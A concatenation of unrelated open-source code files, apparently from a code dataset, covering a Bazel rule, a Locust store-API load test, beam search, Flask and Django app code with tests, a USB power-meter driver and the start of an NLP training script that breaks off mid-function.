script_content = _script_content.format(gazelle=ctx.file._gazelle.short_path, args=" ".join(args))
script_file = ctx.new_file(ctx.label.name+".bash")
ctx.file_action(output=script_file, executable=True, content=script_content)
return struct(
files = depset([script_file]),
runfiles = ctx.runfiles([ctx.file._gazelle])
)
def _go_prefix_default(prefix):
return (None
if prefix
else Label("//:go_prefix", relative_to_caller_repository = True))
_gazelle_script = rule(
_gazelle_script_impl,
attrs = {
"command": attr.string(values=["update", "fix"], default="update"),
"mode": attr.string(values=["print", "fix", "diff"], default="fix"),
"external": attr.string(values=["external", "vendored"], default="external"),
"build_tags": attr.string_list(),
"args": attr.string_list(),
"prefix": attr.string(),
"_gazelle": attr.label(
default = Label("@io_bazel_rules_go//go/tools/gazelle/gazelle:gazelle"),
allow_files = True,
single_file = True,
executable = True,
cfg = "host"
),
"_go_prefix": attr.label(default = _go_prefix_default),
}
)
def gazelle(name, **kwargs):
script_name = name+"_script"
_gazelle_script(
name = script_name,
tags = ["manual"],
**kwargs
)
native.sh_binary(
name = name,
srcs = [script_name],
data = ["//:WORKSPACE"],
tags = ["manual"],
)
| StarcoderdataPython |
151031 | <filename>src/Core/DevOps/Locust/common/store_api.py<gh_stars>0
import random
import json
import uuid
import time
import requests
from locust.exception import RescheduleTask
class StoreApi:
context: None
def __init__(self, client, context):
self.context = context
self.client = client
self.currency_id = random.choice(self.context.sales_channel['currencies'])
self.language_id = random.choice(self.context.sales_channel['languages'])
self.token = str(uuid.uuid4()).replace('-', '')
self.switch_context({
'currencyId': self.currency_id,
'languageId': self.language_id
})
def home(self):
return self.request('/store-api/category/home', name='home')
def navigation(self, activeId = 'main-navigation'):
return self.request('/store-api/navigation/' + activeId + '/main-navigation', name = 'main-navigation')
def footer(self, activeId = 'footer-navigation'):
return self.request('/store-api/navigation/' + activeId + '/footer-navigation', name = 'footer-navigation')
def service(self, activeId = 'service-navigation'):
return self.request('/store-api/navigation/' + activeId + '/service-navigation', name = 'service-navigation')
def shipping_methods(self):
return self.request('/store-api/shipping-method', name='shipping-methods')
def payment_methods(self):
return self.request('/store-api/payment-method', name='payment-methods')
def languages(self):
return self.request('/store-api/language', name='languages')
def currencies(self):
return self.request('/store-api/currency', name='currencies')
def salutations(self):
return self.request('/store-api/salutation', name='salutations')
def countries(self):
return self.request('/store-api/country', name='countries')
def search(self):
return self.request('/store-api/search', name='search', parameters = {'search': random.choice(self.context.keywords)})
def suggest(self):
return self.request('/store-api/search-suggest', name='suggest', parameters = {'search': random.choice(self.context.keywords)})
def cart(self):
return self.request('/store-api/checkout/cart', name='cart')
def product(self):
return self.request('/store-api/product/' + random.choice(self.context.product_ids), name='product')
def listing(self):
return self.request('/store-api/category/' + random.choice(self.context.category_ids), name='listing')
def add_product_to_cart(self):
id = random.choice(self.context.product_ids)
return self.request(
'/store-api/checkout/cart/line-item',
name='add-product-to-cart',
parameters = {
'items': [{'type': 'product', 'id': id, 'referencedId': id}]
}
)
def order(self):
return self.request('/store-api/checkout/order', name='order')
def register(self):
self.email = 'user-' + str(uuid.uuid4()).replace('-', '') + '@example.com'
response = self.request('/store-api/account/register', name='register', parameters={
'storefrontUrl': self.context.sales_channel['domain'],
'salutationId': self.context.sales_channel['salutationId'],
'firstName': 'Firstname',
'lastName': 'Lastname',
'email': self.email,
'password': '<PASSWORD>',
'acceptedDataProtection': True,
'billingAddress': {
'salutationId': self.context.sales_channel['salutationId'],
'street': 'Test street',
'zipcode': '11111',
'city': 'Test city',
'countryId': self.context.sales_channel['countryId']
}
})
self.token = response.headers['sw-context-token']
return response
def switch_context(self, parameters):
response = self.request('/store-api/context', name='context-switch', parameters=parameters, method='PATCH')
self.token = response.headers['sw-context-token']
return response
def get_headers(self):
return {
'Accept': 'application/json',
'Content-Type': 'application/json',
'sw-context-token': self.token,
'sw-access-key': self.context.sales_channel['access_key']
}
def request(self, url, name, parameters = {}, method = 'POST'):
headers = self.get_headers()
if method == 'POST':
response = self.client.post(self.context.url + url, json=parameters, headers=headers, name=name)
elif method == 'PATCH':
response = self.client.patch(self.context.url + url, json=parameters, headers=headers, name=name)
else:
response = self.client.get(self.context.url + url, headers=headers, name=name)
if response.status_code in [200, 204]:
return response
return response
| StarcoderdataPython |
48046 | <gh_stars>0
# The MIT License (MIT)
#
# Copyright (c) 2015 <NAME>, 2018 UMONS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import tensorflow as tf
import numpy as np
class BeamSearch:
def __init__(self, predict, initial_state, prime_labels):
"""Initializes the beam search.
Args:
predict:
A function that takes a `sample` and a `state`. It then performs
the computation on the last word in `sample`.
initial_state:
The initial state of the RNN.
prime_labels:
A list of labels corresponding to the priming text. This must
not be empty.
"""
if not prime_labels:
raise ValueError('prime_labels must be a non-empty list.')
self.predict = predict
self.initial_state = initial_state
self.prime_labels = prime_labels
def predict_samples(self, samples, states):
probs = []
next_states = []
for i in range(len(samples)):
prob, next_state = self.predict(samples[i], states[i])
probs.append(prob.squeeze())
next_states.append(next_state)
return np.array(probs), next_states
def search(self, oov, eos, k=1, maxsample=4000, use_unk=False):
"""Return k samples (beams) and their NLL scores.
Each sample is a sequence of labels, either ending with `eos` or
truncated to length of `maxsample`. `use_unk` allow usage of `oov`
(out-of-vocabulary) label in samples
"""
# A list of probabilities of our samples.
probs = []
prime_sample = []
prime_score = 0
prime_state = self.initial_state
# Initialize the live sample with the prime.
for i, label in enumerate(self.prime_labels):
prime_sample.append(label)
# The first word does not contribute to the score as the probs have
# not yet been determined.
if i > 0:
prime_score = prime_score - np.log(probs[0, label])
probs, prime_state = self.predict(prime_sample, prime_state)
dead_k = 0 # samples that reached eos
dead_samples = []
dead_scores = []
dead_states = []
live_k = 1 # samples that did not yet reached eos
live_samples = [prime_sample]
live_scores = [prime_score]
live_states = [prime_state]
while live_k and dead_k < k:
# total score for every sample is sum of -log of word prb
cand_scores = np.array(live_scores)[:, None] - np.log(probs)
if use_unk and oov is not None:
if isinstance(oov, list):
for word in oov:
cand_scores[:, word] = 1e20
else:
cand_scores[:, oov] = 1e20
cand_flat = cand_scores.flatten()
# find the best (lowest) scores we have from all possible samples and new words
ranks_flat = cand_flat.argsort()[:(k - dead_k)]
live_scores = cand_flat[ranks_flat]
# append the new words to their appropriate live sample
voc_size = probs.shape[1]
live_samples = [live_samples[r // voc_size] + [r % voc_size] for r in ranks_flat]
live_states = [live_states[r // voc_size] for r in ranks_flat]
# live samples that should be dead are...
zombie = [s[-1] == eos or len(s) >= maxsample for s in live_samples]
# add zombies to the dead
dead_samples += [s for s, z in zip(live_samples, zombie) if z] # remove first label == empty
dead_scores += [s for s, z in zip(live_scores, zombie) if z]
dead_states += [s for s, z in zip(live_states, zombie) if z]
dead_k = len(dead_samples)
# remove zombies from the living
live_samples = [s for s, z in zip(live_samples, zombie) if not z]
live_scores = [s for s, z in zip(live_scores, zombie) if not z]
live_states = [s for s, z in zip(live_states, zombie) if not z]
live_k = len(live_samples)
# Finally, compute the next-step probabilities and states.
probs, live_states = self.predict_samples(live_samples, live_states)
return dead_samples + live_samples, dead_scores + live_scores
| StarcoderdataPython |
4837385 | <reponame>daojunL/Art-Event-Gallery
# Generated by Django 2.1.5 on 2020-04-21 04:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0005_auto_20200421_0331'),
]
operations = [
migrations.AlterModelOptions(
name='artist',
options={'managed': True},
),
]
| StarcoderdataPython |
1636236 | from .pycuteweb import Application
| StarcoderdataPython |
1777427 | import hashlib
import os
import sys
import msgpack
from struct import pack
addressChecksumLength = 4
def int64ToBinary(i):
# TODO: error handling
# >q means big endian, long long (int64)
return pack(">q", i)
def intToBytes(i):
return bytes([i])
def sha256(data):
return hashData(hashlib.sha256(), data)
def ripemd160(data):
return hashData(hashlib.new('ripemd160'), data)
def hashPubKey(publicKey):
return ripemd160(sha256(publicKey.to_string()))
def checksum(payload):
return sha256(sha256(payload))[:addressChecksumLength]
def hashData(hashObj, data):
hashObj.update(data)
return hashObj.digest()
# prefer toStr(bytes) than bytes.decode() for readability
def toStr(obj):
if isinstance(obj, str):
return obj
if isinstance(obj, bytes):
return obj.decode()
return str(obj)
def isSubstringOf(a, b):
return b.find(a) == 0
# msgpack serialize
def encodeMsg(d, encoder=None):
return msgpack.packb(d, default=encoder, use_bin_type=True)
# msgpack deserialize
def decodeMsg(msg, decoder=None):
return msgpack.unpackb(msg, object_hook=decoder, raw=False)
def decodeList(msg, decoder):
encodedObjs = decodeMsg(msg)
return [decoder(obj) for obj in encodedObjs]
def canWaitKey():
return sys.stdin.isatty()
# https://stackoverflow.com/a/34956791
# Cross platform, blocking function to get a pressed key
def waitKey():
''' Wait for a key press on the console and return it. '''
result = None
if os.name == 'nt':
import msvcrt
result = msvcrt.getch()
else:
import termios
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
try:
result = sys.stdin.read(1)
except IOError:
pass
except KeyboardInterrupt:
result = 'SIGINT'
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
return result
| StarcoderdataPython |
1749039 | import datetime
import os
import stat
import pytest
from flask import current_app
from flask_app.models import Beam, BeamType, Pin
from flask_app.tasks import beam_up, delete_beam, vacuum
from flask_app.utils.remote_combadge import _COMBADGE_UUID_PART_LENGTH
from flask_app.utils.remote_host import RemoteHost
_TEMPDIR_COMMAND = RemoteHost._TEMPDIR_COMMAND
def is_vacuumed(db_session, beam):
beam = db_session.query(Beam).filter_by(id=beam.id).one_or_none()
if beam is None:
raise RuntimeError(f"Beam {beam.id} not found")
return beam.deleted
def test_completed_beam_past_date_should_be_vacuumed(
eager_celery, db_session, create_beam, expired_beam_date
):
beam = create_beam(start=expired_beam_date, completed=True)
vacuum.delay()
assert is_vacuumed(db_session, beam)
def test_beam_before_date_should_not_be_vacuumed(eager_celery, db_session, create_beam, now):
beam = create_beam(start=now, completed=True)
vacuum.delay()
assert not is_vacuumed(db_session, beam)
def test_not_completed_beam_past_date_should_be_vacuumed(
eager_celery, db_session, create_beam, expired_beam_date
):
beam = create_beam(start=expired_beam_date, completed=False)
vacuum.delay()
assert is_vacuumed(db_session, beam)
def test_not_completed_beam_before_date_should_not_be_vacuumed(
eager_celery, db_session, create_beam, now
):
beam = create_beam(start=now, completed=False)
vacuum.delay()
assert not is_vacuumed(db_session, beam)
def test_beam_with_open_issues_should_not_be_vacuumed(
eager_celery, db_session, create_beam, expired_beam_date, issue
):
beam = create_beam(start=expired_beam_date, completed=True)
beam.issues.append(issue)
db_session.commit()
vacuum.delay()
assert not is_vacuumed(db_session, beam)
def test_pinned_beam_should_not_be_vacuumed(
eager_celery, db_session, create_beam, expired_beam_date, user
):
beam = create_beam(start=expired_beam_date, completed=True)
pin = Pin(user_id=user.id, beam_id=beam.id)
db_session.add(pin)
db_session.commit()
vacuum.delay()
assert not is_vacuumed(db_session, beam)
def test_beam_without_file_should_be_vacuumed(
eager_celery, db_session, create_beam, expired_beam_date
):
beam = create_beam(start=expired_beam_date, completed=True, add_file=False)
db_session.commit()
vacuum.delay()
assert is_vacuumed(db_session, beam)
def test_beam_with_beam_type_greater_threshold_is_not_vacuumed(
eager_celery, db_session, create_beam, expired_beam_date, vacuum_threshold
):
# threshold default threshold now
# | 10 days | 60 days |
# -----------------------------------------------------> date
# |
# beam
#
# beam is before the default threshold (60 days) so it should usually be vacuumed
# but here we increase the threshold by 10 more days (vacuum_threshold=vacuum_threshold + 10)
# and therefore the beam is *within* the threshold and will *not* be vacuumed
beam = create_beam(start=expired_beam_date, completed=True)
beam_type = BeamType(name="beam_type_1", vacuum_threshold=vacuum_threshold + 10)
db_session.add(beam_type)
beam.type = beam_type
db_session.commit()
vacuum.delay()
assert not is_vacuumed(db_session, beam)
def test_beam_with_beam_type_smaller_threshold_is_vacuumed(
eager_celery, db_session, create_beam, now
):
# default threshold threshold now
# | 59 days | 1 day |
# --------------------------------------------------> date
# |
# beam
#
# beam is within the default threshold (60 days) so it should usually *not* be vacuumed
# but here we make the threshold 1 day (vacuum_threshold=1)
# and therefore the beam is outside the threshold and *should* be vacuumed
vacuum_threshold = 1
beam = create_beam(start=now - datetime.timedelta(days=2), completed=True)
beam_type = BeamType(name="beam_type_1", vacuum_threshold=vacuum_threshold)
db_session.add(beam_type)
beam.type = beam_type
db_session.commit()
vacuum.delay()
assert is_vacuumed(db_session, beam)
@pytest.mark.parametrize("os_type", ["linux", "windows"])
def test_beam_up(
db_session,
now,
create_beam,
eager_celery,
monkeypatch,
mock_ssh_client,
mock_sftp_client,
mock_rsa_key,
uuid4,
os_type,
combadge_assets_dir,
):
beam = create_beam(start=now, completed=False)
if os_type == "windows":
beam.host = "mock-windows-host"
db_session.commit()
result = beam_up.delay(
beam_id=beam.id,
host=beam.host,
directory=beam.directory,
username="root",
auth_method="stored_key",
pkey="mock-pkey",
password=<PASSWORD>,
combadge_version="v2",
)
assert result.successful(), result.traceback
beam = db_session.query(Beam).filter_by(id=beam.id).one()
assert beam.error is None
assert len(mock_ssh_client.instances) == 1
uuid_part = uuid4.hex[:_COMBADGE_UUID_PART_LENGTH]
ext = ".exe" if os_type == "windows" else ""
remote_dir = fr"C:\Users\root\AppData\Local\Temp" if os_type == "windows" else "/tmp"
sep = "\\" if os_type == "windows" else "/"
combadge = f"{remote_dir}{sep}combadge_{uuid_part}{ext}"
env_vars = "RUST_LOG=trace " if os_type != "windows" else ""
assert mock_ssh_client.instances[0].commands == [
"uname",
_TEMPDIR_COMMAND,
env_vars + f"{combadge} -b {beam.id} -p {beam.directory} -t scotty",
]
assert len(mock_sftp_client.instances) == 1
expected_calls = [
{
"action": "put",
"args": {
"local": f"{combadge_assets_dir}/v2/combadge_{os_type}/combadge{ext}",
"remote": combadge,
},
},
]
if os_type == "linux":
expected_calls.append(
{
"action": "chmod",
"args": {
"remote": combadge,
"mode": stat.S_IEXEC,
},
}
)
expected_calls.append({"action": "remove", "args": {"remote": combadge}})
mock_sftp_client.get_one_instance_or_raise().assert_calls_equal_to(expected_calls)
assert mock_sftp_client.files == {}
assert len(mock_sftp_client.trash) == 1
assert mock_sftp_client.trash[0] == combadge
def test_delete_beam(eager_celery, beam_with_real_file):
beam = beam_with_real_file
full_file_location = os.path.join(
current_app.config["STORAGE_PATH"], beam.files[0].storage_name
)
assert os.path.exists(full_file_location)
assert not beam.deleted
delete_beam.delay(beam.id)
assert not os.path.exists(full_file_location)
assert beam.deleted
| StarcoderdataPython |
27741 | # -*- coding: utf-8 -*-
"""
:author: <NAME> (徐天明)
:url: http://greyli.com
:copyright: © 2021 <NAME> <<EMAIL>>
:license: MIT, see LICENSE for more details.
"""
from flask import render_template, current_app, request, Blueprint
from albumy.models import User, Photo
user_bp = Blueprint('user', __name__)
@user_bp.route('/<username>')
def index(username):
user = User.query.filter_by(username=username).first_or_404()
page = request.args.get('page', 1, type=int)
per_page = current_app.config['ALBUMY_PHOTO_PER_PAGE']
pagination = Photo.query.with_parent(user).order_by(Photo.timestamp.desc()).paginate(page, per_page)
photos = pagination.items
return render_template('user/index.html', user=user, pagination=pagination, photos=photos)
| StarcoderdataPython |
1718338 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import copy
import datetime
import struct
import threading
import usb.core
import usb.util
VENDOR_FUJITSUCOMP = 0x0430
PRODUCT_FUJITSUCOMP_FX5204PS = 0x0423
OUT_VENDOR_DEVICE = (usb.util.CTRL_OUT
|usb.util.CTRL_TYPE_VENDOR
|usb.util.CTRL_RECIPIENT_DEVICE)
IN_VENDOR_DEVICE = (usb.util.CTRL_IN
|usb.util.CTRL_TYPE_VENDOR
|usb.util.CTRL_RECIPIENT_DEVICE)
CMD_START = 0x01
CMD_VALUE = 0x20
CMD_GET_FIRMWARE = 0xC0
CMD_GET_SERIAL = 0xC1
CMD_GET_VOLTAGE = 0xB0
CMD_GET_TEMP = 0xB4
CMD_GET_FREQ = 0xA1
CMD_GET_UNK0 = 0xA2
MODE_WATTAGE = 0x10
MODE_CURRENT = 0x30
class FX5204PS(threading.Thread):
def __init__(self, sumup_interval=5, ema_alpha=0.1):
super(FX5204PS, self).__init__()
self._stop_event = threading.Event()
self._lock = threading.Lock()
self._sumup_interval = datetime.timedelta(seconds=sumup_interval)
self._ema_alpha = ema_alpha
self._last_sumup_time = datetime.datetime(1970,1,1)
self._count = 0
self._firmware_version = [0, 0]
self._serial_number = 0
self._endpoint = None
self._temperature = 0
self._frequency = 0
self._voltage = 0
self._wattage = [0,0,0,0]
self._wattage_max = [0,0,0,0]
self._wattage_avg = [0,0,0,0]
self._device = self._find_device()
self._initialize()
@property
def firmware_version(self):
return self._firmware_version
@property
def serial_number(self):
return self._serial_number
@property
def temperature(self):
with self._lock:
return self._temperature / 10000
@property
def frequency(self):
with self._lock:
return self._frequency / 1000000
@property
def voltage(self):
with self._lock:
return self._voltage
@property
def wattage(self):
with self._lock:
return [w / 100 for w in self._wattage]
@property
def wattage_max(self):
with self._lock:
return [w / 100 for w in self._wattage_max]
@property
def wattage_avg(self):
with self._lock:
return [w / 100 for w in self._wattage_avg]
def stop(self):
self._stop_event.set()
self.join()
def _find_device(self):
dev = usb.core.find(idVendor=VENDOR_FUJITSUCOMP,
idProduct=PRODUCT_FUJITSUCOMP_FX5204PS)
if dev is None:
raise Exception('No FX5204PS device found.')
return dev
def _initialize(self):
# FX5204PS has only one configuration set.
cfg = self._device[0]
self._device.set_configuration(cfg)
# FX5204PS has only one Interface and one Alternate setting.
iface = cfg[(0,0)]
# FX5204PS has only one outbound endpoint.
self._endpoint = iface[0]
# Get the firmware version.
fmv = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
CMD_GET_FIRMWARE, 0, 0, 2)
self._firmware_version = [(v >> 4) * 10 + (v & 0x0F) for v in fmv]
# Get the serial number.
sno = [(v >> 4) * 10 + (v & 0x0F)
for v
in self._device.ctrl_transfer(IN_VENDOR_DEVICE,
CMD_GET_SERIAL, 0, 0, 3)]
self._serial_number = sno[0]*10000 + sno[1]*100 + sno[2]
def run(self):
while not self._stop_event.is_set():
now = datetime.datetime.now()
self._update_wattage()
if (now - self._last_sumup_time > self._sumup_interval):
self._update_frequency()
self._update_voltage()
self._update_temperature()
self._last_sumup_time = now
self._count = 0
def _update_wattage(self):
data = self._endpoint.read(16)
wattage = struct.unpack('!4H', data[8:])
with self._lock:
self._wattage = wattage
if self._count == 0:
self._wattage_max = copy.copy(wattage)
else:
self._wattage_max = [self._wattage_max[i]
if self._wattage_max[i] > wattage[i]
else wattage[i]
for i in range(len(wattage))]
self._wattage_avg = [self._wattage[i] * self._ema_alpha
+ self._wattage_avg[i] * (1.0-self._ema_alpha)
for i in range(len(self._wattage))]
self._count += 1
def _update_frequency(self):
data = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
CMD_GET_FREQ, 0, 0, 8)
freq = 0
if (data[6] == 0) and (data[7] == 0):
freq = 0
else:
val = (data[1] << 8) + data[0]
if val == 0:
# XXX
pass
freq = 2000000
freq *= 1000000
freq //= val
with self._lock:
self._frequency = freq
def _update_voltage(self):
(volt,) = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
CMD_GET_VOLTAGE, 0, 0, 1)
with self._lock:
self._voltage = volt
def _update_temperature(self):
data = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
CMD_GET_TEMP, 0, 0, 2)
(temp,) = struct.unpack('!H', data)
with self._lock:
self._temperature = temp + 273150
if __name__ == '__main__':
import time
fx = FX5204PS()
print('Firmware: {0}'.format(fx.firmware_version))
print('Serial #: {0}'.format(fx.serial_number))
fx.start()
try:
while True:
time.sleep(1)
print('Volt: {0}V'.format(fx.voltage))
print('Freq: {0}Hz'.format(fx.frequency))
print('Temp: {0}C'.format(fx.temperature))
print('Watt: {0}W@0, {1}W@1, {2}W@2, {3}W@3'.format(*fx.wattage))
print('(Avg): {0}W@0, {1}W@1, {2}W@2, {3}W@3'.format(*fx.wattage_avg))
print('(Max): {0}W@0, {1}W@1, {2}W@2, {3}W@3'.format(*fx.wattage_max))
except KeyboardInterrupt:
fx.stop()
| StarcoderdataPython |
1719769 | <filename>utility/constants.py<gh_stars>1-10
'''Global constants, and file paths'''
import os,re
# Change the path according to your system
embed_path = os.path.expanduser('~') + "/git-workspace/glove/generic/glove.840B.300d.txt" #file containing glove embedding
core_nlp_url = 'http://localhost:9000' #local host url of standford corenlp server
allFolderPath = os.path.expanduser('~')+"/git-workspace/amr_data/e25/data/alignments/split/"
#allFolderPath = os.path.expanduser('~')+"/git-workspace/learnlab/data/e25/data/amrs/split/"
resource_folder_path = os.path.expanduser('~')+"/git-workspace/amr_data/e25/"
frame_folder_path = resource_folder_path+"/data/frames/propbank-frames-xml-2016-03-08/"
# the following files are in the utility/resources folder
vallex_file_path = os.path.expanduser('~')+"/git-workspace/mrp_data/vallex_en.xml"
semi_folder_path = os.path.expanduser('~')+"/git-workspace/mrp_data/1214/etc/"
dm_mwe_file= os.path.expanduser('~')+"/git-workspace/mrp_data/dm.joints"
psd_mwe_file= os.path.expanduser('~')+"/git-workspace/mrp_data/psd.joints"
#allFolderPath = os.path.expanduser('~')+"/Data/amr_annotation_r2/data/alignments/split"
#resource_folder_path = os.path.expanduser('~')+"/Data/amr_annotation_r2/"
#frame_folder_path = resource_folder_path+"data/frames/propbank-frames-xml-2016-03-08/"
have_org_role = resource_folder_path+"have-org-role-91-roles-v1.06.txt" #not used
have_rel_role = resource_folder_path+"have-rel-role-91-roles-v1.06.txt" #not used
morph_verbalization = resource_folder_path+"morph-verbalization-v1.01.txt" #not used
verbalization = resource_folder_path+"verbalization-list-v1.06.txt"
PAD = 0
UNK = 1
# BERT_TOKENS
BERT_PAD = '[PAD]'
BERT_PAD_INDEX = 0
BERT_SEP = '[SEP]'
BERT_SEP_INDEX = 102
BERT_CLS= '[CLS]'
BERT_CLS_INDEX = 101
PAD_WORD = '<pad>'
UNK_WORD = '<unk>'
BOS_WORD = '<s>'
EOS_WORD = '</s>'
NULL_WORD = ""
UNK_WIKI = '<WIKI>'
MWE_END = "<MWE_END>"
Special = [NULL_WORD,UNK_WORD,PAD_WORD]
#Categories
Rule_Frame = "Frame"
Rule_Constant = "Constant"
Rule_String = "String"
Rule_Concept = "Concept"
Rule_Comp = "COMPO"
Rule_Num = "Num"
Rule_Re = "Re" #corenference
Rule_Ner = "Ner"
Rule_B_Ner = "B_Ner"
Rule_Other = "Entity"
Other_Cats = {"person","thing",}
COMP = "0"
Rule_All_Constants = [Rule_Num,Rule_Constant,Rule_String,Rule_Ner]
Splish = "$£%%££%£%£%£%"
Rule_Basics = Rule_All_Constants + [Rule_Frame,Rule_Concept,UNK_WORD,BOS_WORD,EOS_WORD,NULL_WORD,PAD_WORD]
RULE = 0
HIGH = 1
LOW = 2
RE_FRAME_NUM = re.compile(r'-\d\d$')
RE_COMP = re.compile(r'_\d$')
end= re.compile(".txt\_[a-z]*")
epsilon = 1e-8
TXT_WORD = 0
TXT_LEMMA = 1
TXT_POS = 2
TXT_NER = 3
# for AMR
AMR_CAT = 0
AMR_LE = 1
AMR_NER = 2
AMR_AUX = 2
AMR_LE_SENSE = 3
AMR_SENSE = 3
AMR_CAN_COPY = 4
# for DM
DM_POS = 0
DM_CAT = 1
DM_SENSE = 2
DM_LE = 3
DM_CAN_COPY = 4
DM_LE_CAN_COPY = 5
# For EDS
EDS_CAT = 0
EDS_TAG = 1
EDS_LE = 2
EDS_AUX = 3
EDS_CARG= 4
EDS_CAN_COPY = 5
# for PSD
PSD_POS = 0
PSD_LE = 1
PSD_SENSE = 2
PSD_CAN_COPY = 3
# index in sourceBatch
TOK_IND_SOURCE_BATCH=0
LEM_IND_SOURCE_BATCH=1
POS_IND_SOURCE_BATCH=2
NER_IND_SOURCE_BATCH=3
MWE_IND_SOURCE_BATCH=4
ANCHOR_IND_SOURCE_BATCH=5
TOTAL_INPUT_SOURCE=6
C_IND_SOURCE_BATCH=6
R_IND_SOURCE_BATCH=7
TRIPLE_IND_SOURCE_BATCH=8
CN_IND_SOURCE_BATCH=9
CC_IND_SOURCE_BATCH=10
threshold = 5
| StarcoderdataPython |
1618768 | #!/usr/bin/env python
#
import sys
class Tee(object):
""" Redirect print output to the terminal as well as in a log file """
def __init__(self, name=None, mode=None, nostdout=False):
self.file = None
self.nostdout = nostdout
if not nostdout:
self.__del__.im_func.stdout = sys.stdout
self.stdout = self.__del__.im_func.stdout # The weakref proxy is to prevent Python, or yourself from deleting the self.files variable somehow (if it is deleted, then it will not affect the original file list). If it is not the case that this is being deleted even though there are more references to the variable, then you can remove the proxy encapsulation. http://stackoverflow.com/questions/865115/how-do-i-correctly-clean-up-a-python-object
sys.stdout = self
if name is not None and mode is not None:
self.filename = name
self.filemode = mode
self.file = open(name, mode)
def __del__(self):
""" Restore stdout and close file when Tee is closed """
self.flush() # commit all latest changes before exiting
if not self.nostdout and hasattr(self.__del__.im_func, 'stdout'): sys.stdout = self.__del__.im_func.stdout
if self.file: self.file.close()
def write(self, data, end="\n", flush=True):
""" Output data to stdout and/or file """
if not self.nostdout:
self.stdout.write(data+end)
if self.file is not None:
self.file.write(data+end)
if flush:
self.flush()
def flush(self):
""" Force commit changes to the file and stdout """
if not self.nostdout:
self.stdout.flush()
if self.file is not None:
self.file.flush()
# def disable(self):
# """ Temporarily disable Tee's redirection """
# self.flush() # commit all latest changes before exiting
# if not self.nostdout and hasattr(self, 'stdout'):
# sys.stdout = self.stdout
# self.stdout = None
# if self.file:
# self.file.close()
# self.file = None
# def enable(self):
# """ Reenable Tee's redirection after being temporarily disabled """
# if not self.nostdout and not self.stdout:
# self.__del__.im_func.stdout = sys.stdout
# self.stdout = self.__del__.im_func.stdout # The weakref proxy is to prevent Python, or yourself from deleting the self.files variable somehow (if it is deleted, then it will not affect the original file list). If it is not the case that this is being deleted even though there are more references to the variable, then you can remove the proxy encapsulation. http://stackoverflow.com/questions/865115/how-do-i-correctly-clean-up-a-python-object
# sys.stdout = self
# if not self.file and self.filename is not None and self.filemode is not None:
# self.file = open(self.filename, self.filemode)
| StarcoderdataPython |
3218652 | <reponame>IllIIIllll/reinforcement-learning-omok
# © 2020 지성. all rights reserved.
# <<EMAIL>>
# Apache License 2.0
from .base import *
from .naive import *
from .pg import *
from .predict import * | StarcoderdataPython |
1619753 | <reponame>jeniyat/Bert-OverFlow
# coding=utf-8
from __future__ import print_function
import optparse
import itertools
from collections import OrderedDict
import torch
import time
import pickle
from torch.optim import lr_scheduler
from torch.autograd import Variable
# import matplotlib.pyplot as plt #JT: commented it
import sys
import os
import json
import numpy as np
import codecs
# import Visdom #JT: commented it
# from utils import *
# from loader import *
# from config import opts
# from model_wo_char import BiLSTM_CRF
from model import BiLSTM_CRF
import utils_so as utils #JT: utils for SO
import loader_so as loader #JT: loader for SO
from config_so import parameters
from config_so import opts
from utils_so import Sort_Entity_by_Count
import shutil
# from evaluate_so import evaluating
# sys.path.append('../../utility/')
import print_result
import conlleval_py
import tolatex
import time
from Word_Freqency_Mapper import Word_Freqency_Mapper
torch.backends.cudnn.deterministic = True
torch.manual_seed(parameters["seed"])
np.random.seed(parameters["seed"])
assert os.path.isfile(parameters["train"])
assert os.path.isfile(parameters["dev"])
assert os.path.isfile(parameters["test"])
assert parameters['char_dim'] > 0 or parameters['word_dim'] > 0
assert 0. <= parameters['dropout'] < 1.0
assert parameters['tag_scheme'] in ['iob', 'iobes']
assert not parameters['all_emb'] or parameters['pre_emb']
assert not parameters['pre_emb'] or parameters['word_dim'] > 0
# assert not parameters['pre_emb'] or os.path.isfile(parameters['pre_emb'])
def create_frequecny_vector():
# print("***********",parameters["freq_mapper_bin_count"], type(parameters["freq_mapper_bin_count"]))
freq_mapper = Word_Freqency_Mapper(bins=parameters["freq_mapper_bin_count"],w=parameters["freq_mapper_bin_width"])
freq_mapper = Word_Freqency_Mapper()
freq_mapper.Find_Train_Data_Freq(parameters["train"])
freq_mapper.Read_Dev_Data(parameters["dev"])
freq_mapper.Read_Test_Data(parameters["test"])
freq_mapper.Find_Gaussian_Bining_For_Training_Data_Freq()
freq_mapper.Find_Freq_Vector_for_words()
freq_mapper.Write_Freq_To_File(parameters['freq_vector_file'])
def save_char_embed(sentence_words, char_embed_dict, char_embed_vectors):
# print(sentence_words)
# print(char_embed_dict)
# print(char_embed_vectors)
for sent_iter in range(len(sentence_words)):
word = sentence_words[sent_iter]
word_char_vector = char_embed_vectors[sent_iter]
char_embed_dict[word]=word_char_vector
# print(word, word_char_vector)
return char_embed_dict
def read_ctc_pred_file():
ctc_pred_dict = {}
for line in open(parameters["ctc_pred"]):
if line.strip()=="":
continue
line_values= line.strip().split("\t")
word, ctc_pred = line_values[0], line_values[-1]
